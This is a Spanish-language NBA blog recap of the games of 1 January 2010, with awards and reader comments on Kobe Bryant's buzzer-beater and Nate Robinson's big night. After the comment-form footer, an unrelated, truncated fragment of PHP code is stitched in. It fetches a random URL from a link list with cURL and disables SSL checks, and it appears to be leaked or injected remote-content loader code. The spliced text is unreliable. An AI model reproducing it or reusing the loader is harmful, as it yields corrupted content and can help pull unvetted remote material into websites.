La Crónica (02/01/2010)

02 de January de 2010 por TheDeerHunter

Otra vez más. Ya no sabemos ni cuantas. Los protagonistas, conocidos. Sacramento gana de dos en el Staples cuando quedan escasos 5 segundos. Hawes ha hecho el partido de su vida. También Casspi, casi podríamos decir lo mismo de Udrih, e incluso de Udoka. Sin embargo en un abrir y cerrar de ojos todo se tuerce. El alero de ascendencia nigeriana lanza dos tiros libres para amarrar el partido. El primero se sale rebotado por pura mala suerte. El segundo es un desastre. Saca L.A. Todos piensan en KB24. El balón sin embargo llega a Pau Gasol por fuera y todo se desordena. Movimientos caóticos. Le hacen sobremarcaje a Pau donde menos daño hace y él la dobla, sin demasiada precisión tampoco. El balón le llega algo bajo a Kobe, completamente solo y es entonces cuando vuelve el orden. Se cuadra como tantas veces le hemos visto… y anota al borde de la luz roja en el tablero. Los árbitros se quedan estudiando la jugada final, pero Westphal se marcha sin esperar el veredicto. Hoy se publican titulares similares a “Milagro”. Pero con Kobe de por medio eso comienza a ser una falacia.

Sí que es milagroso, en cambio, que D’Antoni decida emplear espíritu navideño con Nate Robinson y el pequeño Kriptonita obtenga la plena redención destrozando en el último cuarto (remontada de 15 puntos de por medio) y en la prórroga a los Hawks en el mismísimo Phillips Arena de Atlanta.

Por su parte, los Magic lo tuvieron mucho más fácil destrozando a Minnesota. Parece mentira que sea viernes con tan poquitos encuentros.

PREMIOS:

MVP: Kobe Bryant ahora mismo está en otra dimensión. No existe nada lejanamente comparable. 39 puntos, 5 rebotes, 5 asistencias y elevando el baloncesto a la categoría de arte.

El rookie: Sensacional Casspi, que se fue con bastante mala leche del Staple (con cierta razón, por cierto) también lo estuvo Jonny Flynn, aunque perdió de muchos más puntos que el israelí.

La sorpresa: Si ayer le hubieramos dicho a Mike D’Antoni que Nate Robinson le iba a sacar las castañas del fuego en Atlanta hubiera creído que le estábamos vacilando. 41 puntos, 6 rebotes, 8 asistencias para “el pequeño”.

La decepción: Si Jason Thompson no hubiera hecho 0 puntos, posiblemente su equipo hubiera ganado el partido.

El mayor esfuerzo en vano: Hawes. 30 puntos, 11 rebotes, 5 asistencias para ver desde el otro lado de la cancha cómo KB24 se queda solo en el peor momento del mundo.

RAZONES PARA TRASNOCHAR:

Hasta 12 distintas… Mañana tendremos trabajo. Recomendamos especialmente el Houston@New Orleans, la visita de los Thunder a Milwaukee, el Denver@Utah y, ¿porqué no? la visita de los sorprendentes Grizzlies a la casa de Steve Nash.

Comenta

7 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Me vi el partido entero de los Lakers… y es que los porcentajes de los Kings en la 1º parte eran increibles, metian todo y en cambio Kobe 3/11 y Fisher 1/9. Y en el 3º cuarto Odon y Kobe impresionantes anotando todo.

    Me gustaron mucho los ultimos ataques de los Kings, con 3 triples (2 de Hawes y 1 de Casspi en una jugada de pizarra magistral).

    En fin, al final lo de siempre… canaston de Kobe y adios (aunque en alguna repeticion parecia que pisaba la linea lateral del campo, supongo que eso es lo que consultaron los arbitros).

      Citar

  2. Txusma dice:
    #2

    Kobe es grandisimo, sin más. Ya no hay dudas ni fobias. Junto con Tim Duncan, es le mejor jugador de la NBA desde que se retiro Jordan y posiblemente se merezca escalar alguna posicion más en aquel ranking de los 50 mejores jugadores de la historia que hizo Deer hace un tiempo. Acabará muy cerquita de los 10 primeras como el de los Spurs. Suerte tenemos de disfrutar de estos 2 monstruos.

      Citar

  3. Love Denise dice:
    #3

    Feliz Año Nuevo a todos y todas.

    Efectivamente todo sigue igual en L.A., horrible juego colectivo de los angelinos, cargando todo el partido sobre los hombros de Bryant, Pau en plan máquina en el 1er cuarto, en plan “se dejaba llevar” en 2º, 3º y 4º cuarto, excepto en el último minuto con un 2+1 y un reb. ofensivo, con Fisher que hizo bueno a Udrih, con Bynum que hizo a Hawes parecer el mejor pivot de la liga, con un espantoso banquillo y con los cracks cargandose de minutos. Me gustó el juego de Sacmento, en especial Sergio y Casspi. Por cierto, me pareció que Kobe pisa la línea de banda en el triple,,, y sí Sergio espera que los arbitros le piten falta a favor en el Staples, contra Kobe, en el último segundo, y por ese leve empujón, que espere sentado, porque ayer, el teatro le salió mal, en Sacto, se estarán acordando de su madre y de la de Udoka.

    Buen juego de los Magic, Van Gundy ha puesto a Barnes de titular en detrímento de Pietrus, y firmando otro doble-doble, confirmandose como uno de los aleros que mejor rebotea.
    Los Knicks ganaron a los Hawks, con partidazo de Robinson que se reivindicó a D’Antoni.

    PD: Ahora que Gilette va a rescindir el contrato a Tiger Woods, deberían fichar a Adam Morrison, y de paso, ¡¡¡que se afeite ese horrible bigote!!!!!!!!

      Citar

  4. Dantley2 dice:
    #4

    3 en menos de un mes, es increíble. Ahora mismo está en un nivel no de MVP sino de mucho más.

    Eso sí, hay que destacar el enorme esfuerzo de los Kings, magníficos hasta la pájara y sin Evans ni Martin. Gran trabajo de Westphal. Hay futuro

    Aún así para mí el MVP es Nate Robinson, para mí es más increíble que los de Kobe. Venir directamente de la nevera y vencer casi sólo a unos grandes Hawks es irrepetible. Además con unos porcentajes increíbles. Eso sí, igual ahora se cree Kobe y le da por intentar ser el héroe. Pero vamos, la noche de ayer de Nate es memorable.

      Citar

  5. Lagarto dice:
    #5

    Estos Lakers me reafirman cada día más en mi temor de que no están ni muchísimo menos en plan campeón. Lo bueno que tienen es que el nivel de equipos gallitos este año está bajito…aunque los Cavs parecen que están espabilando y mucho. Ahora mismo son de temer.

    Feliz año a todos.
    Lagarto.

      Citar

  6. TheDeerHunter dice:
    #6

    Insisto en un dato. Los Lakers, están en más “plan campeón” que nunca. Por desgracia en el peor sentido de la palabra, pero tampoco como para alarmarse.
    Quiero recordar que este año, sin Pau en más de un mes de competición, llevan mejores números en prácticamente todo que el año pasado. Sobre todo en defensa que a mí era lo que verdaderamente me preocupaba el año pasado (y también en lo de los minutos, que era todavía más sangrante y luego se demostraría como una leyenda urbana)
    Lo que sí queda claro es que Artest es fundamental. Para eso se fichó… también me alegro de que Ariza lo esté haciendo tan bien en Houston. Me quedo con Artest… y su mala fama que no es más que eso.

    De los pies en la línea de Kobe, sólo me remito a la foto de portada, para saber si estaba pisando o no. Westphal ni rechistó, ojito, siendo la voz más autorizada en el asunto. De todas formas en mi opinión merecieron ganar los Kings. Jugaron de cine. Lástima que pierdan la gran mayoría de los muchos partidos a los que llegan igualados. Tampoco es casualidad… les falta subir un escalón. Por ahí se les están yendo los playoffs.
    Ficha a Udrih, Phill.

    Nate Robinson, sí… mucho mérito tiene… pero necesitó un periodo extra más para hacer similares números de Kobe. Y en la comparación con Kobe para mí ahora mismo pierde todo el mundo, simplemente por estilo. Lo dice Daimiel, no lo digo yo. Este año Kobe tiene poco de envidiarle a Jordan… si acaso diría al revés, y espero no blasfemar con esto.

    Por último… muy de acuerdo con que es un gran acierto meter a Barnes de titular en lugar de Pietrus. A veces se nos olvida hasta que punto es gran plantilla Orlando y Barnes, hasta la fecha, es una clara muestra de lo mal explotada que está.
    Con esto no quiero decir que Pietrus sea una mala pieza, pero para mí en este equipo no puede ser titular nunca.

      Citar

  7. NBA LAKERS BLOG dice:
    #7

    Cito:

    “PREMIOS:

    MVP: Kobe Bryant ahora mismo está en otra dimensión. No existe nada lejanamente comparable. 39 puntos, 5 rebotes, 5 asistencias y elevando el baloncesto a la categoría de arte.

    Qué poesía! Cada vez mejor trabajo en este blog! Simplemente, esplendido!

    Te espero en nuestro blog de los Lakers!

    Exitos para tu comienzo en el 2010!

    Un abrazo!

    –NM–

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>